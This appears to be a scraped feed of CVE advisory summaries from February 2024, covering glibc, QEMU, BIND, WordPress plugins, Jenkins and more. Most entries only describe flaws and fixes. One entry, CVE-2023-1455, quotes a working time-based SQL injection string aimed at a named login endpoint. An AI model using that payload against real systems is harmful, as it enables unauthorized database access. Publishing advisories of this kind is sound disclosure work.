🚨 CVE-2024-1345Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to perform a brute force attack and easily discover the root password.🎖@cveNotify |
|
| 2024-02-19 12:37:47 |
🚨 CVE-2024-1344Encrypted database credentials in LaborOfficeFree affecting version 19.10. This vulnerability allows an attacker to read and extract the username and password from the database of 'LOF_service.exe' and 'LaborOfficeFree.exe' located in the '%programfiles(x86)%\LaborOfficeFree\' directory. This user can log in remotely and has root-like privileges.🎖@cveNotify |
|
| 2024-02-19 12:37:46 |
🚨 CVE-2023-6780An integer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when these functions are called with a very long message, leading to an incorrect calculation of the buffer size to store the message, resulting in undefined behavior. This issue affects glibc 2.37 and newer.🎖@cveNotify |
|
| 2024-02-19 12:37:45 |
🚨 CVE-2023-5378Improper Input Validation vulnerability in MegaBIP and already unsupported SmodBIP software allows for Stored XSS.This issue affects SmodBIP in all versions and MegaBIP in versions up to 4.36.2. MegaBIP 5.08 was tested and is not vulnerable. A precise range of vulnerable versions remains unknown.🎖@cveNotify |
|
| 2024-02-19 11:37:30 |
🚨 CVE-2024-26308Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress: from 1.21 before 1.26.Users are recommended to upgrade to version 1.26, which fixes the issue.🎖@cveNotify |
|
| 2024-02-19 11:37:29 |
🚨 CVE-2023-40547A remote code execution vulnerability was found in Shim. The Shim boot support trusts attacker-controlled values when parsing an HTTP response. This flaw allows an attacker to craft a specific malicious HTTP request, leading to a completely controlled out-of-bounds write primitive and complete system compromise. This flaw is only exploitable during the early boot phase, an attacker needs to perform a Man-in-the-Middle or compromise the boot server to be able to exploit this vulnerability successfully.🎖@cveNotify |
|
| 2024-02-19 06:37:26 |
🚨 CVE-2024-24722An unquoted service path vulnerability in the 12d Synergy Server and File Replication Server components may allow an attacker to gain elevated privileges via the 12d Synergy Server and/or 12d Synergy File Replication Server executable service path. This is fixed in 4.3.10.192, 5.1.5.221, and 5.1.6.235.🎖@cveNotify |
|
| 2024-02-19 05:37:25 |
🚨 CVE-2024-26328An issue was discovered in QEMU 7.1.0 through 8.2.1. register_vfs in hw/pci/pcie_sriov.c does not set NumVFs to PCI_SRIOV_TOTAL_VF, and thus interaction with hw/nvme/ctrl.c is mishandled.🎖@cveNotify |
|
| 2024-02-19 05:37:24 |
🚨 CVE-2024-26327An issue was discovered in QEMU 7.1.0 through 8.2.1. register_vfs in hw/pci/pcie_sriov.c mishandles the situation where a guest writes NumVFs greater than TotalVFs, leading to a buffer overflow in VF implementations.🎖@cveNotify |
|
| 2024-02-19 04:37:24 |
🚨 CVE-2024-26318Serenity before 6.8.0 allows XSS via an email link because LoginPage.tsx permits return URLs that do not begin with a / character.🎖@cveNotify |
|
| 2024-02-19 03:37:48 |
🚨 CVE-2023-4408The DNS message parsing code in `named` includes a section whose computational complexity is overly high. It does not cause problems for typical DNS traffic, but crafted queries and responses may cause excessive CPU load on the affected `named` instance by exploiting this flaw. This issue affects both authoritative servers and recursive resolvers.This issue affects BIND 9 versions 9.0.0 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.9.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.🎖@cveNotify |
|
| 2024-02-19 03:37:47 |
🚨 CVE-2021-43784runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc, netlink is used internally as a serialization system for specifying the relevant container configuration to the `C` portion of the code (responsible for the based namespace setup of containers). In all versions of runc prior to 1.0.3, the encoder did not handle the possibility of an integer overflow in the 16-bit length field for the byte array attribute type, meaning that a large enough malicious byte array attribute could result in the length overflowing and the attribute contents being parsed as netlink messages for container configuration. This vulnerability requires the attacker to have some control over the configuration of the container and would allow the attacker to bypass the namespace restrictions of the container by simply adding their own netlink payload which disables all namespaces. The main users impacted are those who allow untrusted images with untrusted configurations to run on their machines (such as with shared cloud infrastructure). runc version 1.0.3 contains a fix for this bug. As a workaround, one may try disallowing untrusted namespace paths from your container. It should be noted that untrusted namespace paths would allow the attacker to disable namespace protections entirely even in the absence of this bug.🎖@cveNotify |
|
| 2024-02-19 02:37:24 |
🚨 CVE-2020-36774plugins/gtk+/glade-gtk-box.c in GNOME Glade before 3.38.1 and 3.39.x before 3.40.0 mishandles widget rebuilding for GladeGtkBox, leading to a denial of service (application crash).🎖@cveNotify |
|
| 2024-02-19 01:37:25 |
🚨 CVE-2022-48624close_altfile in filename.c in less before 606 omits shell_quote calls for LESSCLOSE.🎖@cveNotify |
|
| 2024-02-18 10:37:24 |
🚨 CVE-2023-5366A flaw was found in Open vSwitch that allows ICMPv6 Neighbor Advertisement packets between virtual machines to bypass OpenFlow rules. This issue may allow a local attacker to create specially crafted packets with a modified or spoofed target IP address field that can redirect ICMPv6 traffic to arbitrary IP addresses.🎖@cveNotify |
|
| 2024-02-18 08:37:24 |
🚨 CVE-2023-5779can: out of bounds in remove_rx_filter function🎖@cveNotify |
|
| 2024-02-18 07:37:30 |
🚨 CVE-2023-6749Unchecked length coming from user input in settings shell🎖@cveNotify |
|
| 2024-02-18 07:37:25 |
🚨 CVE-2023-52379Permission control vulnerability in the calendarProvider module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-02-18 07:37:24 |
🚨 CVE-2022-48621Vulnerability of missing authentication for critical functions in the Wi-Fi module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-02-18 06:37:25 |
🚨 CVE-2023-52377Vulnerability of input data not being verified in the cellular data module.Successful exploitation of this vulnerability may cause out-of-bounds access.🎖@cveNotify |
|
| 2024-02-18 06:37:24 |
🚨 CVE-2023-52375Permission control vulnerability in the WindowManagerServices module.Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2024-02-18 04:37:32 |
🚨 CVE-2023-52371Vulnerability of null references in the motor module.Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2024-02-18 04:37:25 |
🚨 CVE-2023-52367Vulnerability of improper access control in the media library module.Successful exploitation of this vulnerability may affect service availability and integrity.🎖@cveNotify |
|
| 2024-02-18 04:37:24 |
🚨 CVE-2023-52366Out-of-bounds read vulnerability in the smart activity recognition module.Successful exploitation of this vulnerability may cause features to perform abnormally.🎖@cveNotify |
|
| 2024-02-18 03:37:32 |
🚨 CVE-2023-52361The VerifiedBoot module has a vulnerability that may cause authentication errors.Successful exploitation of this vulnerability may affect integrity.🎖@cveNotify |
|
| 2024-02-18 03:37:26 |
🚨 CVE-2023-52360Logic vulnerabilities in the baseband.Successful exploitation of this vulnerability may affect service integrity.🎖@cveNotify |
|
| 2024-02-18 03:37:25 |
🚨 CVE-2023-52357Vulnerability of serialization/deserialization mismatch in the vibration framework.Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2024-02-18 03:37:24 |
🚨 CVE-2023-42465Sudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit.🎖@cveNotify |
|
| 2024-02-18 02:37:25 |
🚨 CVE-2023-50868The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.🎖@cveNotify |
|
| 2024-02-18 02:37:24 |
🚨 CVE-2023-50387Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.🎖@cveNotify |
|
| 2024-02-17 17:37:25 |
🚨 CVE-2022-41738IBM Storage Scale Container Native Storage Access 5.1.2.1 -through 5.1.7.0 could allow an attacker to initiate connections to containers from external networks. IBM X-Force ID: 237812.🎖@cveNotify |
|
| 2024-02-17 17:37:24 |
🚨 CVE-2022-41737IBM Storage Scale Container Native Storage Access 5.1.2.1 through 5.1.7.0 could allow a local attacker to initiate connections from a container outside the current namespace. IBM X-Force ID: 237811.🎖@cveNotify |
|
| 2024-02-17 16:37:25 |
🚨 CVE-2024-22336IBM QRadar Suite 1.10.12.0 through 1.10.17.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 279976.🎖@cveNotify |
|
| 2024-02-17 16:37:24 |
🚨 CVE-2023-50951IBM QRadar Suite 1.10.12.0 through 1.10.17.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 in some circumstances will log some sensitive information about invalid authorization attempts. IBM X-Force ID: 275747.🎖@cveNotify |
|
| 2024-02-17 10:37:24 |
🚨 CVE-2023-6267A flaw was found in the json payload. If annotation based security is used to secure a REST resource, the JSON body that the resource may consume is being processed (deserialized) prior to the security constraints being evaluated and applied. This does not happen with configuration based security.🎖@cveNotify |
|
| 2024-02-17 08:37:25 |
🚨 CVE-2024-1512The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-02-17 08:37:24 |
🚨 CVE-2024-0610The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'MerchantReference' parameter in all versions up to, and including, 1.6.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-02-17 06:37:25 |
🚨 CVE-2024-25468An issue in TOTOLINK X5000R V.9.1.0u.6369_B20230113 allows a remote attacker to cause a denial of service via the host_time parameter of the NTPSyncWithHost component.🎖@cveNotify |
|
| 2024-02-17 06:37:24 |
🚨 CVE-2024-25297Cross Site Scripting (XSS) vulnerability in Bludit CMS version 3.15, allows remote attackers to execute arbitrary code and obtain sensitive information via edit-content.php.🎖@cveNotify |
|
| 2024-02-17 05:37:25 |
🚨 CVE-2024-21493All versions of the package github.com/greenpau/caddy-security are vulnerable to Improper Validation of Array Index when parsing a Caddyfile. Multiple parsing functions in the affected library do not validate whether their input values are nil before attempting to access elements, which can lead to a panic (index out of range). Panics during the parsing of a configuration file may introduce ambiguity and vulnerabilities, hindering the correct interpretation and configuration of the web server.🎖@cveNotify |
|
| 2024-02-17 05:37:24 |
🚨 CVE-2024-21492All versions of the package github.com/greenpau/caddy-security are vulnerable to Insufficient Session Expiration due to improper user session invalidation upon clicking the "Sign Out" button. User sessions remain valid even after requests are sent to /logout and /oauth2/google/logout. Attackers who gain access to an active but supposedly logged-out session can perform unauthorized actions on behalf of the user.🎖@cveNotify |
|
| 2024-02-17 04:37:25 |
🚨 CVE-2024-22727Teltonika TRB1-series devices with firmware before TRB1_R_00.07.05.2 allow attackers to exploit a firmware vulnerability via Ethernet LAN or USB.🎖@cveNotify |
|
| 2024-02-17 04:37:24 |
🚨 CVE-2023-31728Teltonika RUT240 devices with firmware before 07.04.2, when bridge mode is used, sometimes make SSH and HTTP services available on the IPv6 WAN interface even though the UI shows that they are only available on the LAN interface.🎖@cveNotify |
|
| 2024-02-17 02:37:32 |
🚨 CVE-2024-24575libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_revparse_single` can cause the function to enter an infinite loop, potentially causing a Denial of Service attack in the calling application. The revparse function in `src/libgit2/revparse.c` uses a loop to parse the user-provided spec string. There is an edge-case during parsing that allows a bad actor to force the loop conditions to access arbitrary memory. Potentially, this could also leak memory if the extracted rev spec is reflected back to the attacker. As such, libgit2 versions before 1.4.0 are not affected. Users should upgrade to version 1.6.5 or 1.7.2.🎖@cveNotify |
|
| 2024-02-17 02:37:25 |
🚨 CVE-2024-22211FreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. there are no know workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-17 02:37:24 |
🚨 CVE-2023-49083cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Calling `load_pem_pkcs7_certificates` or `load_der_pkcs7_certificates` could lead to a NULL-pointer dereference and segfault. Exploitation of this vulnerability poses a serious risk of Denial of Service (DoS) for any application attempting to deserialize a PKCS7 blob/certificate. The consequences extend to potential disruptions in system availability and stability. This vulnerability has been patched in version 41.0.6.🎖@cveNotify |
|
| 2024-02-16 23:37:25 |
🚨 CVE-2024-21984StorageGRID (formerly StorageGRID Webscale) versions prior to 11.8 are susceptible to a difficult to exploit Reflected Cross-Site Scripting (XSS) vulnerability. Successful exploit requires the attacker to know specific information about the target instance and trick a privileged user into clicking a specially crafted link. This could allow the attacker to view or modify configuration settings or add or modify user accounts.🎖@cveNotify |
|
| 2024-02-16 23:37:24 |
🚨 CVE-2024-21983StorageGRID (formerly StorageGRID Webscale) versions prior to 11.8 are susceptible to a Denial of Service (DoS) vulnerability. Successful exploit by an authenticated attacker could lead to an out of memory condition or node reboot.🎖@cveNotify |
|
| 2024-02-16 22:37:25 |
🚨 CVE-2024-24758Undici is an HTTP/1.1 client, written from scratch for Node.js. Undici already cleared Authorization headers on cross-origin redirects, but did not clear `Proxy-Authentication` headers. This issue has been patched in versions 5.28.3 and 6.6.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-16 22:37:24 |
🚨 CVE-2023-45918ncurses 6.4-20230610 has a NULL pointer dereference in tgetstr in tinfo/lib_termcap.c.🎖@cveNotify |
|
| 2024-02-16 22:07:26 |
🚨 CVE-2024-24821Composer is a dependency Manager for the PHP language. In affected versions several files within the local working directory are included during the invocation of Composer and in the context of the executing user. As such, under certain conditions arbitrary code execution may lead to local privilege escalation, provide lateral user movement or malicious code execution when Composer is invoked within a directory with tampered files. All Composer CLI commands are affected, including composer.phar's self-update. The following scenarios are of high risk: Composer being run with sudo, Pipelines which may execute Composer on untrusted projects, Shared environments with developers who run Composer individually on the same project. This vulnerability has been addressed in versions 2.7.0 and 2.2.23. It is advised that the patched versions are applied at the earliest convenience. Where not possible, the following should be addressed: Remove all sudo composer privileges for all users to mitigate root privilege escalation, and avoid running Composer within an untrusted directory, or if needed, verify that the contents of `vendor/composer/InstalledVersions.php` and `vendor/composer/installed.php` do not include untrusted code. A reset can also be done on these files by the following:```shrm vendor/composer/installed.php vendor/composer/InstalledVersions.phpcomposer install --no-scripts --no-plugins```🎖@cveNotify |
|
| 2024-02-16 21:37:32 |
🚨 CVE-2024-1406A vulnerability was found in Linksys WRT54GL 4.30.18. It has been declared as problematic. This vulnerability affects unknown code of the file /SysInfo1.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-253330 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-16 21:37:25 |
🚨 CVE-2024-24819icingaweb2-module-incubator is a working project of bleeding edge Icinga Web 2 libraries. In affected versions the class `gipfl\Web\Form` is the base for various concrete form implementations [1] and provides protection against cross site request forgery (CSRF) by default. This is done by automatically adding an element with a CSRF token to any form, unless explicitly disabled, but even if enabled, the CSRF token (sent during a client's submission of a form relying on it) is not validated. This enables attackers to perform changes on behalf of a user which, unknowingly, interacts with a prepared link or website. The version 0.22.0 is available to remedy this issue. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-16 21:37:24 |
🚨 CVE-2024-24820Icinga Director is a tool designed to make Icinga 2 configuration handling easy. Not any of Icinga Director's configuration forms used to manipulate the monitoring environment are protected against cross site request forgery (CSRF). It enables attackers to perform changes in the monitoring environment managed by Icinga Director without the awareness of the victim. Users of the map module in version 1.x, should immediately upgrade to v2.0. The mentioned XSS vulnerabilities in Icinga Web are already fixed as well and upgrades to the most recent release of the 2.9, 2.10 or 2.11 branch must be performed if not done yet. Any later major release is also suitable. Icinga Director will receive minor updates to the 1.8, 1.9, 1.10 and 1.11 branches to remedy this issue. Upgrade immediately to a patched release. If that is not feasible, disable the director module for the time being.🎖@cveNotify |
|
| 2024-02-16 21:07:31 |
🚨 CVE-2020-18694Cross Site Request Forgery (CSRF) in IgnitedCMS v1.0 allows remote attackers to obtain sensitive information and gain privilege via the component "/admin/profile/save_profile".🎖@cveNotify |
|
| 2024-02-16 21:07:27 |
🚨 CVE-2018-15203An issue was discovered in Ignited CMS through 2017-02-19. ign/index.php/admin/pages/add_page allows a CSRF attack to add pages.🎖@cveNotify |
|
| 2024-02-16 21:07:26 |
🚨 CVE-2004-0005Multiple buffer overflows in Gaim 0.75 allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) octal encoding in yahoo_decode that causes a null byte to be written beyond the buffer, (2) octal encoding in yahoo_decode that causes a pointer to reference memory beyond the terminating null byte, (3) a quoted printable string to the gaim_quotedp_decode MIME decoder that causes a null byte to be written beyond the buffer, and (4) quoted printable encoding in gaim_quotedp_decode that causes a pointer to reference memory beyond the terminating null byte.🎖@cveNotify |
|
| 2024-02-16 21:07:25 |
🚨 CVE-2003-0356Multiple off-by-one vulnerabilities in Ethereal 0.9.11 and earlier allow remote attackers to cause a denial of service and possibly execute arbitrary code via the (1) AIM, (2) GIOP Gryphon, (3) OSPF, (4) PPTP, (5) Quake, (6) Quake2, (7) Quake3, (8) Rsync, (9) SMB, (10) SMPP, and (11) TSP dissectors, which do not properly use the tvb_get_nstringz and tvb_get_nstringz0 functions.🎖@cveNotify |
|
| 2024-02-16 20:37:32 |
🚨 CVE-2023-42450Mastodon is a free, open-source social network server based on ActivityPub. Starting in version 4.2.0-beta1 and prior to version 4.2.0-rc2, by crafting specific input, attackers can inject arbitrary data into HTTP requests issued by Mastodon. This can be used to perform confused deputy attacks if the server configuration includes `ALLOWED_PRIVATE_ADDRESSES` to allow access to local exploitable services. Version 4.2.0-rc2 has a patch for the issue.🎖@cveNotify |
|
| 2024-02-16 20:37:26 |
🚨 CVE-2023-33684Weak session management in DB Elettronica Telecomunicazioni SpA SFT DAB 600/C Firmware: 1.9.3 Bios firmware: 7.1 (Apr 19 2021) Gui: 2.46 FPGA: 169.55 uc: 6.15 allows attackers on the same network to bypass authentication by re-using the IP address assigned to the device by the NAT protocol.🎖@cveNotify |
|
| 2024-02-16 20:37:25 |
🚨 CVE-2009-0115The Device Mapper multipathing driver (aka multipath-tools or device-mapper-multipath) 0.4.8, as used in SUSE openSUSE, SUSE Linux Enterprise Server (SLES), Fedora, and possibly other operating systems, uses world-writable permissions for the socket file (aka /var/run/multipathd.sock), which allows local users to send arbitrary commands to the multipath daemon.🎖@cveNotify |
|
| 2024-02-16 20:37:24 |
🚨 CVE-2003-0844mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.🎖@cveNotify |
|
| 2024-02-16 20:07:31 |
🚨 CVE-2024-25219A cross-site scripting (XSS) vulnerability in Task Manager App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Task Name parameter /TaskManager/Task.php.🎖@cveNotify |
|
| 2024-02-16 20:07:30 |
🚨 CVE-2024-25218A cross-site scripting (XSS) vulnerability in Task Manager App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Project Name parameter /TaskManager/Projects.php.🎖@cveNotify |
|
| 2024-02-16 20:07:27 |
🚨 CVE-2023-3534A vulnerability was found in SourceCodester Shopping Website 1.0. It has been classified as critical. Affected is an unknown function of the file check_availability.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-233286 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-16 20:07:26 |
🚨 CVE-2023-3502A vulnerability, which was classified as critical, was found in SourceCodester Shopping Website 1.0. Affected is an unknown function of the file search-result.php. The manipulation of the argument product leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-232950 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-16 20:07:25 |
🚨 CVE-2023-3457A vulnerability was found in SourceCodester Shopping Website 1.0. It has been classified as critical. Affected is an unknown function of the file index.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-232674 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-16 19:37:43 |
🚨 CVE-2024-25320Tongda OA v2017 and up to v11.9 was discovered to contain a SQL injection vulnerability via the $AFF_ID parameter at /affair/delete.php.🎖@cveNotify |
|
| 2024-02-16 19:37:36 |
🚨 CVE-2024-25221A cross-site scripting (XSS) vulnerability in Task Manager App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note Section parameter at /TaskManager/Tasks.php.🎖@cveNotify |
|
| 2024-02-16 19:37:35 |
🚨 CVE-2023-50875Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Automattic Sensei LMS – Online Courses, Quizzes, & Learning allows Stored XSS.This issue affects Sensei LMS – Online Courses, Quizzes, & Learning: from n/a through 4.17.0.🎖@cveNotify |
|
| 2024-02-16 19:37:31 |
🚨 CVE-2023-22049Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 8u371, 8u371-perf, 11.0.19, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 20.3.10, 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-02-16 19:37:30 |
🚨 CVE-2022-48328app/Controller/Component/IndexFilterComponent.php in MISP before 2.4.167 mishandles ordered_url_params and additional_delimiters.🎖@cveNotify |
|
| 2024-02-16 19:07:39 |
🚨 CVE-2024-1189A vulnerability has been found in AMPPS 2.7 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Encryption Passphrase Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252679. NOTE: The vendor explains that AMPPS 4.0 is a complete overhaul and the code was re-written.🎖@cveNotify |
|
| 2024-02-16 19:07:38 |
🚨 CVE-2023-4933The WP Job Openings WordPress plugin before 3.4.3 does not block listing the contents of the directories where it stores attachments to job applications, allowing unauthenticated visitors to list and download private attachments if the autoindex feature of the web server is enabled.🎖@cveNotify |
|
| 2024-02-16 19:07:37 |
🚨 CVE-2023-36478Eclipse Jetty provides a web server and servlet container. In versions 11.0.0 through 11.0.15, 10.0.0 through 10.0.15, and 9.0.0 through 9.4.52, an integer overflow in `MetaDataBuilder.checkSize` allows for HTTP/2 HPACK header values toexceed their size limit. `MetaDataBuilder.java` determines if a header name or value exceeds the size limit, and throws an exception if the limit is exceeded. However, when length is very large and huffman is true, the multiplication by 4 in line 295will overflow, and length will become negative. `(_size+length)` will now be negative, and the check on line 296 will not be triggered. Furthermore, `MetaDataBuilder.checkSize` allows for user-entered HPACK header value sizes to be negative, potentially leading to a very large buffer allocation later on when the user-entered size is multiplied by 2. This means that if a user provides a negative length value (or, more precisely, a length value which, when multiplied by the 4/3 fudge factor, is negative), and this length value is a very large positive number when multiplied by 2, then the user can cause a very large buffer to be allocated on the server. Users of HTTP/2 can be impacted by a remote denial of service attack. The issue has been fixed in versions 11.0.16, 10.0.16, and 9.4.53. There are no known workarounds.🎖@cveNotify |
|
| 2024-02-16 19:07:34 |
🚨 CVE-2023-41990The issue was addressed with improved handling of caches. This issue is fixed in tvOS 16.3, iOS 16.3 and iPadOS 16.3, macOS Monterey 12.6.8, macOS Big Sur 11.7.9, iOS 15.7.8 and iPadOS 15.7.8, macOS Ventura 13.2, watchOS 9.3. Processing a font file may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1.🎖@cveNotify |
|
| 2024-02-16 19:07:33 |
🚨 CVE-2023-1455A vulnerability classified as critical was found in SourceCodester Online Pizza Ordering System 1.0. This vulnerability affects unknown code of the file admin/ajax.php?action=login2 of the component Login Page. The manipulation of the argument email with the input abc%40qq.com' AND (SELECT 9110 FROM (SELECT(SLEEP(5)))XSlc) AND 'jFNl'='jFNl leads to sql injection. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223300.🎖@cveNotify |
|
| 2024-02-16 19:07:32 |
🚨 CVE-2023-1352A vulnerability, which was classified as critical, has been found in SourceCodester Design and Implementation of Covid-19 Directory on Vaccination System 1.0. This issue affects some unknown processing of the file /admin/login.php. The manipulation of the argument txtusername/txtpassword leads to sql injection. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222851.🎖@cveNotify |
|
| 2024-02-16 19:07:29 |
🚨 CVE-2022-27211A missing permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2024-02-16 19:07:28 |
🚨 CVE-2017-16534The cdc_parse_cdc_header function in drivers/usb/core/message.c in the Linux kernel before 4.13.6 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.🎖@cveNotify |
|
| 2024-02-16 19:07:27 |
🚨 CVE-2003-1233Pedestal Software Integrity Protection Driver (IPD) 1.3 and earlier allows privileged attackers, such as rootkits, to bypass file access restrictions to the Windows kernel by using the NtCreateSymbolicLinkObject function to create a symbolic link to (1) \Device\PhysicalMemory or (2) to a drive letter using the subst command.🎖@cveNotify |
|
| 2024-02-16 18:07:32 |
🚨 CVE-2023-42811aes-gcm is a pure Rust implementation of the AES-GCM. Starting in version 0.10.0 and prior to version 0.10.3, in the AES GCM implementation of decrypt_in_place_detached, the decrypted ciphertext (i.e. the correct plaintext) is exposed even if tag verification fails. If a program using the `aes-gcm` crate's `decrypt_in_place*` APIs accesses the buffer after decryption failure, it will contain a decryption of an unauthenticated input. Depending on the specific nature of the program this may enable Chosen Ciphertext Attacks (CCAs) which can cause a catastrophic breakage of the cipher including full plaintext recovery. Version 0.10.3 contains a fix for this issue.🎖@cveNotify |
|
| 2024-02-16 18:07:28 |
🚨 CVE-2023-43669The Tungstenite crate before 0.20.1 for Rust allows remote attackers to cause a denial of service (minutes of CPU consumption) via an excessive length of an HTTP header in a client handshake. The length affects both how many times a parse is attempted (e.g., thousands of times) and the average amount of data for each parse attempt (e.g., millions of bytes).🎖@cveNotify |
|
| 2024-02-16 18:07:27 |
🚨 CVE-2022-21282Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2024-02-16 17:07:32 |
